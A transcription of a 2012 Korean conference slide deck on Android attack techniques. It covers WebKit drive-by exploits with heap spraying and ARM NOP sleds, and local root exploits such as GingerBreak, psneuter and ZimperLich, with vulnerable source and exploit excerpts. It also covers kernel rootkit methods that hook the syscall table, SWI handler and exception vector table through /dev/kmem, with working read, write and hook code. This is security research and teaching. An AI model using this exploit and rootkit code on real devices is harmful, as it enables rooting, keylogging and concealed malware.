2012_6th_CodeEngn_[x82]_모바일_스마트_플랫폼_원격_로컬_취약점_공격_분석.ppt [호환 모드]

Transcription

1 Android 모바일스마트플랫폼 취약점공격기법분석 CodeEngn ReverseEngineering Conference 아이넷캅연구소장유동훈

2 Android Security Overview Remote/Local Exploitation Kernel Level Attacks Agenda

3 Android 보안위협배경 3/47 Android 스마트폰플랫폼취약점보안위협 2009년 8월, 플랫폼에탑재된커널결함을통한최초로컬루팅공격코드해외공개 2010년, 3/4분기 Android 스마트플랫폼웹브라우저최초원격공격코드해외공개 2010년 6월, Defcon 18에서 LKM 형태의 Android 커널기반 Rootkit 해외공개 인터넷검색만으로스마트폰해킹후설치되는커널악성코드, 키로거공격코드발표 Android 스마트플랫폼특성상보안업데이트적용이어려운근본적인문제점존재 스마트폰취약점으로인한보안위협 악성코드가설치된웹에접속 실행된악성코드가해커에게폰내에정보를외부로전송 사용자웹브라우저에서스마트폰웹악성코드가자동실행악성코드 해커 사용자가브라우저를통해서비스에접속

4 Android 보안위협배경 4/47 Android Patch Lifecycle 및 version timeline 참고자료 [TIM11]

5 Android 보안위협배경 5/47 Local vulnerabilities by year (CVSS severity) 참고자료 [JON10]

6 Android 보안위협배경 6/47 Unprivileged App Attacks (Application Attack) 격리환경 (sandbox) 에서설치되는응용앱에의해시도되는악의적인행위 관련위협사례 : Geinimi, PJApps, ADRD, DroidDream Remote Exploitation (Drive-by Download Attack) 긴패치사이클을고려할때취약점패치이전에공격이이루어질가능성높음 관련취약점 CVE , , , 관련논문 : MAR06, ALE07, MAR08 Local Exploitation (Privilege Escalation Attack) 로컬취약점을이용하여관리자권한으로상승하는루팅행위 관련취약점 : CVE , , , 관련논문 : LUC10, TIM11, SEB11 Kernel Level Attacks (Rootkit & Key Logger Attack) 커널내에상주하는응용된악성코드 관련논문 : JEF10, TRU10, DON11

7 Android 보안위협배경 7/47 현존하는 Android 스마트플랫폼취약점보안위협분류

8 Android 보안위협배경 8/47 현존하는 Android 스마트플랫폼취약점보안위협분류 Success rate danger line android-root gingerbreak exploid levitator psneuter zimperlich zergrush CVE CVE CVE CVE CVE CVE Killinginthe nameof rageagainst thecage metho d

9 Android 보안위협배경 9/47 스마트플랫폼모바일 exploit (iphone/android) 통계 Win32 exploit 12 개를스마트폰으로포팅해본결과, Eclair 7 개, Froyo 5 개, Gingerbread 2 개의공격가능한 exploit 이개발됨 Iphone 3g

10 Android Security Overview Remote/Local Exploitation Kernel Level Attacks Agenda

11 Remote Exploitation 11/47 Android Drive-by Download 공격기법 사용자가모르게악성코드를자동으로다운로드받아실행하는원격공격의일종 주로 use-after-free 취약점을 Heap spraying 기법으로공격하는사례등이발견 Drive-by Download 공격

12 Remote Exploitation 12/47 Android 원격시스템취약점공격기법 접근권한이없는공격자가시스템내부취약점을통해원격으로공격을시도 역접속과정 (reverse connection) 을통해원격시스템의일반권한쉘실행 현존하는대부분의원격시스템취약점공격이웹페이지접속을통해이루어짐 과거원격공격과달리최근 win32 클라이언트공격과같은 user interaction 필요 향후발생가능성이높은 Android 원격시스템취약점침해사고사례 SMS나 MMS로도착한문자메시지내의 URL을클릭하여발생하는침해사고 SNS 사이트의짧게줄인외부링크를클릭하여발생하는침해사고 공격자가만든 QR 코드를촬영하여 URL에접속시발생하는침해사고 공격자에게해킹당한웹페이지에접속시발생하는침해사고 웹서비스로제공되는메일함내의 URL이나첨부파일클릭시발생하는침해사고

13 원격취약점유발원인및공격방법 13/47 Dangling Pointer / Invalid, expired pointer de-reference 오류및기타예외상황발생시메모리처리루틴의설계혼란으로프로그램이해제된포인터를계속참조할때발생 접근불가한메모리영역을참조하여 access violation 발생 Watchfire 사가 2007년 BlackHat 컨퍼런스를통해시연 Use-after-free, Double free, Memory leak 결함으로분류 웹브라우저, 3 rd party 어플리케이션에존재하는상기취약점공격시 Heap spray, JIT spray 등의공격기법시도 Heap spraying Attack 힙에코드를뿌리듯이주입하여코드를실행시키는공격방법 웹브라우저 (javascript), adobe (actionscript) 취약점을대상으로한공격가능 취약점에의해비정상적인메모리주소로 JMP나 CALL이발생할경우해당메모리영역까지실행하고자하는코드를반복주입하여힙메모리구역의코드를실행 프로세스가이미점유중인메모리영역, 커널영역주소는공격불가

14 원격취약점공격방법 14/47 Android Linux 환경에서 Heap spraying 공격특징 하드웨어사양에따라힙메모리에할당가능한크기제약존재 쉘코드주입, 취약점유발시브라우저화면내에공격코드를출력시켜야함 공격시 maps 파일과 logcat 명령결과참고, gdb, objdump 도구로디버깅 범용적으로사용할 ARM 아키텍쳐전용쉘코드작성필요 SVC 인스트럭션코드를수정하여 syscall base 주소변경 ef svc 0x # Base address of EABI 0 ef svc 0x # Base address of OABI 0x 해외제품은 EABI 호출방식, 국내제품은 OABI 호출방식사용 ARM 아키텍처전용 NOP sled 사용 #1: var scode2 = unescape("\u5005\ue1a0"); // normal NOP sled #2: var nop = unescape("\u33bc\u0057"); // LDREQH R3,[R7],-0x3C (addressing) #3: var nop = unescape("\u33bc\u0079"); // LDRHTEQ r3, [r9], -0x3C (addressing) #4: var nop = unescape( \u33\bc\u009b ); // LDRHEQ r3, [r11], r12 (addressing)

15 원격취약점공격사례 15/47 CVE : webkit library vulnerability Android 2.0, 2.1, 버전에탑재된 webkit library에존재하는원격취약점 parsefloat() 함수의 floating point 데이터형식의잘못된 NAN parsing bug 취약한 webkit을사용중인경우원격공격자가웹브라우저권한획득가능 발견자 : Luke Wagner of Mozilla 취약점정보 : CVE , bid: 46105, changeset Exploit 개발자 : MJ Keith, Itzhak Avraham Exploit 정보 #1: Exploit 정보 #2: 1 description( 2 "This test checks for a crash when parsing NaN. You should see the text 'NaN' below." 3 ); 4 5 debug(-parsefloat("nan(ffffeeeeeff0f)")); 6 7 var successfullyparsed = true;

16 원격취약점공격사례 16/47 CVE : webkit library vulnerability Android 2.0, 2.1, 버전에탑재된 webkit library에존재하는원격취약점 removechild() 함수의 use-after-free 취약점으로인해발생 취약한 webkit을사용중인경우원격공격자가웹브라우저권한획득가능 발견자 : apple, google, VUPEN VRT, Tippingpoint 취약점정보 : CVE , bid: 40620, changeset Exploit 개발자 : MJ Keith Exploit 정보 #1: <HTML><HEAD> <SCRIPT>function test() { nodes=document.getelementbyid( target ).getattributenode( id ).childnodes; document.getelementbyid( target ).getattributenode( id ).removechild(nodes[0]); settimeout(function(){for(var i=0;i<0x10000;i++){var s=new String(unescape( XXXX"));} nodes[0].textcontent},0); }</SCRIPT></HEAD> <BODY onload=test()><p id=target></p></body> </HTML>

17 원격취약점공격사례 17/47 Android를대상으로한원격취약점사례 CVE webkit library vulnerability (changeset 63048) HTML Objects outline memory corruption bug CVE adobe flash vulnerability (apsa11-02) SharedObject.prototype.getSize and Date memory corruption bug CVE webkit library vulnerability (changeset 59109) Node.normalize method remote code execution bug CVE adobe flash vulnerability (apsb11-21) MP4 sequenceparametersetnalunit Remote code execution bug

18 Local Exploitation 18/47 Privilege Escalation 공격기법 네이티브레이어내의로컬취약점을통해관리자접근권한으로상승하는행위 Rooting: 단말내에서관리자권한을취득하여사용자권한이 root 인상태를의미 로컬권한상승공격 (rooting)

19 Local Exploitation 19/47 Android 로컬시스템취약점공격기법 단말을가진사용자가임의로펌웨어를변경하는 local rooting 방법 Android 어플리케이션이나 Linux 커널에존재하는취약점을로컬에서공격 리눅스커널을탑재하고있어리눅스커널에서발견된결함으로도공격가능 취약한 setuid 프로그램대상공격보다데몬서비스취약점악용사례가더많은편 현존하는대부분의취약점공격코드는 The Android Exploid Crew에서발표현존하는 Android 로컬시스템취약점공격사례 Exploid: 리눅스커널 udev 취약점을통한로컬권한상승취약점공격 RageAgainstTheCage: adb RLIMIT_NPROC setuid() 로컬권한상승취약점공격 ZimperLich: Zygote RLIMIT_NPROC setuid() 로컬권한상승취약점공격 KillingInTheNameof, psneuter: adb ashmem 로컬권한상승취약점공격 GingerBreak: Vold Volume Manager 로컬권한상승취약점공격 ZergRush: libsysutils use-after-free 로컬권한상승취약점공격 Lavitator: PowerVR SGX 커널모듈로컬권한상승취약점공격

20 로컬취약점공격사례 20/47 CVE : 리눅스 udev 취약점을통한로컬권한상승공격 Android 이하, udev 이전버전시스템에존재하는취약점 NETLINK 메시지를전송하여관리자권한에서임의내용으로파일쓰기가능 취약점정보 : CVE , bid: 취약점발견자 / Exploit 개발자 : Sebastian Krahmer (stealth) Exploit 정보 : CVE-2010-EASY: zygote / adb RLIMIT_NPROC 로컬권한상승공격 Android 이하버전시스템에서존재하는취약점 프로세스개수를늘려 RLIMIT_NPROC 제한을넘기면 zygote, adb 실행시함수호출이실패하면서관리자권한쉘실행 취약점정보 : CVE-2010-EASY ( 정보없음 ) 취약점발견자 / Exploit 개발자 : Sebastian Krahmer (stealth) Exploit 정보 #1: Exploit 정보 #2:

21 로컬취약점공격사례 21/47 CVE : 리눅스 udev 취약점을통한로컬권한상승공격 // NETLINK 메시지를처리하는 platform/system/core.git/init/devices.c 취약코드 void process_firmware_event(struct uevent *uevent) { l = asprintf(&root, SYSFS_PREFIX"%s/", uevent->path); l = asprintf(&loading, "%sloading", root); l = asprintf(&data, "%sdata", root); l = asprintf(&file1, FIRMWARE_DIR1"/%s", uevent->firmware); loading_fd = open( loading, O_WRONLY); // 공격자가생성한 loading 파일 data_fd = open(data, O_WRONLY); // 공격자가 hotplug 파일과링크한 data 파일 fw_fd = open(file1, O_RDONLY); // 공격자가만든 attack 파일 if(!load_firmware(fw_fd, loading_fd, data_fd)) } int load_firmware(int fw_fd, int loading_fd, int data_fd) { write(loading_fd, "1", 1); // 전송시작 while (len_to_copy > 0) { nr = read(fw_fd, buf, sizeof(buf)); // 공격자의 attack 파일을읽어 while (nr > 0) { // data 에기록, /proc/sys/kernel/hotplug 내용변조 nw = write(data_fd, buf + nw, nr); }

22 로컬취약점공격사례 22/47 CVE-2010-EASY: adb RLIMIT_NPROC 로컬권한상승공격 adb.c 취약코드 : setgroups(sizeof(groups)/sizeof(groups[0]), groups); /* then switch user and group to "shell" */ setgid(aid_shell); setuid(aid_shell); /* set CAP_SYS_BOOT capability, so "adb reboot" will succeed */ header.version = _LINUX_CAPABILITY_VERSION; CVE-2010-EASY: zygote RLIMIT_NPROC 로컬권한상승공격 ZimperLich 공격코드 : for (;;) { if ((p = fork()) == 0) { // RLIMIT_NPROC 에도달할때까지 fork() exit(1); } else if (p < 0) { sleep(3); } return 0

23 로컬취약점공격사례 23/47 CVE : adb ashmem 로컬권한상승공격 Android 2.3 이하버전시스템에서존재하는취약점 ashmem 공유메모리의 ro.secure, ASHMEM_SET_PROT_MASK 재설정취약점 취약점정보 : CVE 취약점발견자 / Exploit 개발자 : Sebastian Krahmer (stealth) Exploit 정보 #1: Exploit 정보 #2: $ cat /proc/self/maps grep ashmem a000 r-xs : /dev/ashmem/system_properties (deleted) $ $ getprop [ro.secure]: [1] [ro.allow.mock.location]: [1] [ro.debuggable]: [1]... $

24 로컬취약점공격사례 24/47 CVE : adb ashmem ro.secure 로컬권한상승공격 KillingInTheNameOf 공격코드 : printf("[+] Found prop %p\n", prop); if (mprotect(prop, PA_SIZE, PROT_READ PROT_WRITE) < 0) die("[-] mprotect"); pi = (struct prop_info *)(prop + PA_INFO_START); pa = (struct prop_area *)prop; while (pa->count--) { printf("[*] %s: %s\n", pi->name, pi->value); if (strcmp(pi->name, "ro.secure") == 0) { strcpy(pi->value, "0"); printf("[+] ro.secure resetted to 0\n"); break; CVE : adb ashmem ASHMEM_SET_PROT_MASK 로컬권한상승공격 psneuter 공격코드 : #define ASHMEMIOC 0x77 #define ASHMEM_SET_PROT_MASK _IOW( ASHMEMIOC, 5, unsigned long) if((ppage = mmap(0, sz, PROT_READ, MAP_SHARED, fd, 0)) == MAP_FAILED) if(ioctl(fd, ASHMEM_SET_PROT_MASK, 0)) // asmmem 내의 ro.secure 설정변경

25 로컬취약점공격사례 25/47 CVE : Vold volume manager overflow 로컬권한상승공격 Android 2.1 버전부터 3.0 이하버전시스템에존재하는취약점 NETLINK 메시지로인해 Vold 볼륨매니저데몬에서정수형오버플로우발생 취약점정보 : CVE 취약점발견자 / Exploit 개발자 : Sebastian Krahmer (stealth) Exploit 정보 : // /system/vold/directvolume.cpp 취약코드 : void DirectVolume::handlePartitionAdded(const char *devpath, NetlinkEvent *evt) { int major = atoi(evt->findparam("major")); int minor = atoi(evt->findparam("minor")); int part_num; const char *tmp = evt->findparam("partn"); part_num = atoi(tmp); if (part_num > mdisknumparts) { mdisknumparts = part_num; } mpartminors[part_num -1] = minor; // 부적절한인덱스참조로취약점발생

26 로컬취약점공격사례 26/47 CVE : Vold volume manager overflow 로컬권한상승공격 GingerBreak 공격코드 : n = snprintf(buf, sizeof(buf), "@/foo%caction=add%csubsystem=block%c" "DEVPATH=%s%c" "MAJOR=179%cMINOR=%d%cDEVTYPE=harder%cPARTN=%d", 0, 0, 0, vold.device, 0, 0, vold.system, 0, 0, -idx); // GOT 덮어쓰기시도 if (honeycomb) { n = snprintf(buf, sizeof(buf), "@/foo%caction=add%csubsystem=block%c" "SEQNUM=%s%cDEVPATH=%s%c" "MAJOR=%s%cMINOR=%s%cDEVTYPE=%s%cPARTN=1", 0, 0, 0, bsh, 0, bsh, 0, bsh, 0, bsh, 0, bsh, 0); // shell 명령실행유도 } else if (froyo) { /system/vold/directvolume.cpp atoi 호출부분코드 : int major = atoi(evt->findparam("major")); // system("/data/local/tmp/boomsh"); int minor = atoi(evt->findparam("minor")); // system("/data/local/tmp/boomsh"); const char *tmp = evt->findparam("partn"); part_num = atoi(tmp); // system("/data/local/tmp/boomsh");

27 로컬취약점공격사례 27/47 CVE : libsysutils buffer overflow 로컬권한상승공격 Android 2.2 버전부터 버전시스템에존재하는취약점 로컬에설치된앱이 FrameworkListener::dispatchCommand() 함수에잘못된숫자의파라미터정보를넘길때 libsysutils에서발생하는 buffer overflow 취약점정보 : CVE 취약점발견자 / Exploit 개발자 : The Revolutionary development team Exploit 정보 : CVE , 1352: PowerVR SGX 커널모듈로컬권한상승공격 Android 이하버전시스템에존재하는취약점 PowerVR SGX 커널모듈에존재하는커널메모리덤프취약점과변조취약점 취약점정보 : CVE , CVE 취약점발견자 / Exploit 개발자 : Jon Larimer, Jon Oberheide Exploit 정보 :

28 Demonstration Remote/Local Exploitation Demonstration

29 Android Security Overview Remote/Local Exploitation Kernel Level Attacks Agenda

30 Kernel Level Attacks 30/47 Kernel 기반 Rootkit 기술 공격자가 Linux kernel 을장악하여플랫폼내의모든레이어에대한권한확보 어플리케이션레이어가변조되더라도 end-user 가행위를탐지하기어려움 커널레벨루트킷, 키로깅, 키인젝션공격

31 Kernel Level Attacks 31/47 LKM (loadable kernel module) 동적적재를통한커널접근기술 커널컴파일및재부팅없이도개발한코드를커널내에추가하거나제거가능 Android 역시기존리눅스커널과동일한 LKM 기능을기본으로제공 OS에서기본으로제공하는프로그래밍인터페이스인시스템콜을후킹 약 360개배열형태의 sys_call_table 내에저장된함수주소를변경하는방식 KMEM device 접근을통한커널메모리접근기술 과거리눅스커널과같이 KMEM 디바이스접근을통해커널메모리읽기, 쓰기가능 Silvio cesare의 RUNTIME KERNEL PATCHING, sd의 Phrack 58-7호에서다뤄진기술 /dev/mem ( 선형 ), /dev/kmem ( 가상 ) 메모리맵핑파일을통한커널메모리접근 사용자레벨에서모듈설치과정없이런타임커널을패치할수있는장점제공 각제조사에서제공하는다양한커널버전에비의존적, 독립적으로동작

32 Kernel Level Attacks 32/47 커널공격을통한 Android 스마트플랫폼보안무력화 OS 커널 하드웨어기기스마트플랫폼 라이브러리 Application Framework Core library Dalvik VM 플랫폼커널공격을통한각종어플리케이션제어 백신 APP

33 Kernel Level Attacks 33/47 Android 스마트플랫폼커널보안위협종류 터치패드입력키감시 : 각종입력정보 ( 계좌, 비밀번호 ) 노출 주요전자금융거래내역조작 : 해커의계좌로돈을이체하는사고발생 발전된커널기반봇넷 : 네트웍상태정보은닉 (C&C 커넥션채널 ) 일반적인커널루트킷 : 원격, 로컬백도어및악성코드정보은닉 사용자앱 / 브라우저터치키보드입력로그인인증인증서버 키보드입력정보감시 중간자키보드입력조작 해커가공격가능한취약구간 해커

34 Kernel Level Attacks 34/47 Android 스마트플랫폼 Kernel Rootkit Hooking 기술 Exception vector table (EVT) exception vector table hooking Dalvic Virtual Machine (java) 0xffff0000 Reset s branch code UNDEF s branch code Core/Native library (C/C++) 0xffff0008 SWI SWI s branch code vector_swi (exception handler) hooking Exception Handler 0xffff0420 vector_swi s address vector_swi system call table 0x0a sys_unlink s address sys_call_table hooking 0x0b 0x0c 0x0d sys_execve s address sys_chdir s address sys_time s address kernel byte code patching sys_execve USER MODE KERNEL MODE system call function

35 Kernel Level Attacks 35/47 Android Kernel Rootkit #1: sys_call_table Hooking 기술

36 Kernel Level Attacks 36/47 Android Kernel Rootkit #1: sys_call_table 검색기술 Android 플랫폼커널은높은주소에구현된 high vector(0xffff0000) 를사용 EVT 0x8 offset 지점 (0xffff0008) 에 SWI 핸들러로 branch 하는인스트럭션을통해 0x420 offset 지점 (0xffff0420) 에저장된 vector_swi SWI 핸들러를호출 void get_sys_call_table(){ void *swi_addr=(long *)0xffff0008; // EVT 0x8 offset 지점 unsigned long offset=0; unsigned long *vector_swi_addr=0; unsigned long sys_call_table=0; offset=((*(long *)swi_addr)&0xfff)+8; // 0x420 offset 지점 vector_swi_addr=*(unsigned long *)(swi_addr+offset); // SWI 핸들러주소를얻음 } while(vector_swi_addr++){ if(((*(unsigned long *)vector_swi_addr)&0xfffff000)==0xe28f8000){ offset=((*(unsigned long *)vector_swi_addr)&0xfff)+8; sys_call_table=(void *)vector_swi_addr+offset; break; } } return; c0 <vector_swi>: : e1a09689 mov r9, r9, lsl #13 [*]108: e28f8094 add r8, pc, #148 ; load syscall table pointer 10c: e599c000 ldr ip, [r9] ; check for syscall tracing

37 Kernel Level Attacks 37/47 Android Kernel Rootkit #1: sys_call_table 검색기술 공개심볼인 sys_close 는 sys_call_table 내에여섯번째시스템콜로지정됨 vector_swi 주소를얻은후쉽게 sys_call_table 주소를얻을수있음... vector_swi 주소검색루틴수행후... while(vector_swi_addr++){ if(*(unsigned long *)vector_swi_addr==&sys_close){ sys_call_table=(void *)vector_swi_addr-(6*4); break; } } fs/open.c: EXPORT_SYMBOL(sys_close);... call.s: /* 0 */ CALL(sys_restart_syscall) CALL(sys_exit) CALL(sys_fork_wrapper) CALL(sys_read) CALL(sys_write) /* 5 */ CALL(sys_open) CALL(sys_close)

38 Kernel Level Attacks 38/47 Android Kernel Rootkit #1: sys_call_table Hooking 기술 /dev/kmem 디바이스에대한 root 권한의접근을허용하고있음 Lseek() 함수로이동, read() 함수로읽거나 write() 함수로쓰는것이가능 #define MAP_SIZE 4096UL #define MAP_MASK (MAP_SIZE - 1) int kmem; void read_kmem(unsigned char *m,unsigned off,int sz) { int i; void *buf,*v_addr; #define MAP_SIZE 4096UL #define MAP_MASK (MAP_SIZE - 1) int kmem; void write_kmem(unsigned char *m,unsigned off,int sz) { int i; void *buf,*v_addr; } if((buf=mmap(0,map_size*2,prot_read PROT_WRITE, MAP_SHARED,kmem,off&~MAP_MASK))==(void *)-1){ perror("read: mmap error"); exit(0); } for(i=0;i<sz;i++){ v_addr=buf+(off&map_mask)+i; m[i]=*((unsigned char *)v_addr); } if(munmap(buf,map_size*2)==-1){ perror("read: munmap error"); exit(0); } return; } if((buf=mmap(0,map_size*2,prot_read PROT_WRITE, MAP_SHARED,kmem,off&~MAP_MASK))==(void *)-1){ perror("write: mmap error"); exit(0); } for(i=0;i<sz;i++){ v_addr=buf+(off&map_mask)+i; *((unsigned char *)v_addr)=m[i]; } if(munmap(buf,map_size*2)==-1){ perror("write: munmap error"); exit(0); } return;

39 Kernel Level Attacks 39/47 Android Kernel Rootkit #1: sys_call_table Hooking 기술 /dev/kmem 접근기술을통해 sys_call_table 을변경하여후킹하는예제 kmem=open("/dev/kmem",o_rdwr O_SYNC); if(kmem<0){ return 1; }... if(c=='i' c=='i'){ /* install */ addr_ptr=(char *)get_kernel_symbol("hacked_getuid"); write_kmem((char *)&addr_ptr,addr+ NR_GETUID*4,4); addr_ptr=(char *)get_kernel_symbol("hacked_writev"); write_kmem((char *)&addr_ptr,addr+ NR_WRITEV*4,4); addr_ptr=(char *)get_kernel_symbol("hacked_kill"); write_kmem((char *)&addr_ptr,addr+ NR_KILL*4,4); addr_ptr=(char *)get_kernel_symbol("hacked_getdents64"); write_kmem((char *)&addr_ptr,addr+ NR_GETDENTS64*4,4); } else if(c=='u' c=='u'){ /* uninstall */... } close(kmem);

40 Kernel Level Attacks 40/47 Android Kernel Rootkit #2: SWI handler Hooking 기술

41 Kernel Level Attacks 41/47 Android Kernel Rootkit #2: SWI handler Hooking 기술 sys_call_table 을직접수정하지않고복사본을커널힙메모리내에생성 복사본을사용하도록 vector_swi 핸들러내의 sys_call_table 핸들코드를수정 static void *hacked_sys_call_table[500]; static void **sys_call_table; int sys_call_table_size; int init_module(void){ get_sys_call_table(); // sys_call_table 위치와크기를구함 memcpy(hacked_sys_call_table,sys_call_table,sys_call_table_size*4); 컴파일이전코드 : ENTRY(vector_swi)... get_thread_info tsk adr tbl, sys_call_table ; load syscall table pointer ~~~~~~~~~~~~~~~~~~~~~~~~~~~ -> sys_call_table을다루는코드 ldr ip, [tsk, #TI_FLAGS] check for syscall tracing 컴파일이후코드 : c0 <vector_swi>: : e1a096ad mov r9, sp, lsr #13 ; get_thread_info tsk 104: e1a09689 mov r9, r9, lsl #13 [*]108: e28f8094 add r8, pc, #148 ; load syscall table pointer ~~~~~~~~~~~~~~~~~~~~ -> sys_call_table을상대오프셋으로다룸 10c: e599c000 ldr ip, [r9] ; check for syscall tracing

42 Kernel Level Attacks 42/47 Android Kernel Rootkit #3: EVT Hooking 기술

43 Kernel Level Attacks 43/47 Android Kernel Rootkit #3: EVT Hooking 기술 EVT 내의 SWI 핸들러주소를변경하여공격자가만든가짜핸들러를대신호출함 sys_call_table 복사본과 vector_swi 복사본을만든후 EVT 내의주소를변경함 #./coelacanth -e [000] ffff0000: ef9f0000 [Reset] ; svc 0x9f0000 branch 코드배열 [004] ffff0004: ea0000dd [Undef] ; b 0x380 [008] ffff0008: e59ff410 [SWI] ; ldr pc, [pc, #1040] ; 0x420 [00c] ffff000c: ea0000bb [Abort-perfetch] ; b 0x300 [010] ffff0010: ea00009a [Abort-data] ; b 0x280 [014] ffff0014: ea0000fa [Reserved] ; b 0x404 [018] ffff0018: ea [IRQ] ; b 0x608 [01c] ffff001c: ea0000f7 [FIQ] ; b 0x400 [020] Reserved... skip... [22c] ffff022c: c003dbc0 [ irq_usr] ; 예외핸들러함수주소배열 [230] ffff0230: c003d920 [ irq_invalid] [234] ffff0234: c003d920 [ irq_invalid] [238] ffff0238: c003d9c0 [ irq_svc] [23c] ffff023c: c003d920 [ irq_invalid]... [420] ffff0420: c003df40 [vector_swi] ; 공격자의가짜핸들러로변경

44 Kernel Level Attacks 44/47 Android Kernel Rootkit #4: EVT Hooking 기술

45 Kernel Level Attacks 45/47 Android Kernel Rootkit #4: EVT Hooking 기술 SWI 발생시호출되는 EVT 내의 4byte branch 인스트럭션코드의오프셋을변경 sys_call_table 과 vector_swi 복사본을만든후 EVT 내의오프셋 1byte 를변경 [000] ffff0000: ef9f0000 [Reset] ; svc 0x9f0000 branch 코드배열 [004] ffff0004: ea0000dd [Undef] ; b 0x380 [008] ffff0008: e59ff410 [SWI] ; ldr pc, [pc, #1040] ; 0x skip... [420] ffff0420: c003df40 [vector_swi] ; 정상적인상태의 SWI 핸들러주소 [000] ffff0000: ef9f0000 [Reset] ; svc 0x9f0000 branch 코드배열 [004] ffff0004: ea0000dd [Undef] ; b 0x380 [008] ffff0008: e59ff414 [SWI] ; ldr pc, [pc, #1044] ; 0x skip... [420] ffff0420: c003df40 [vector_swi] [424] ffff0424: bf0ceb5c [new_vector_swi] ; 가짜 vector_swi 핸들러코드

46 Demonstration Kernel Level Attacks Demonstration

47 Q & A By "dong-hoon you" (Xpl017Elz), in (c)inetcop MSN & x82(at)inetcop(dot)org Home: CodeEngn ReverseEngineering Conference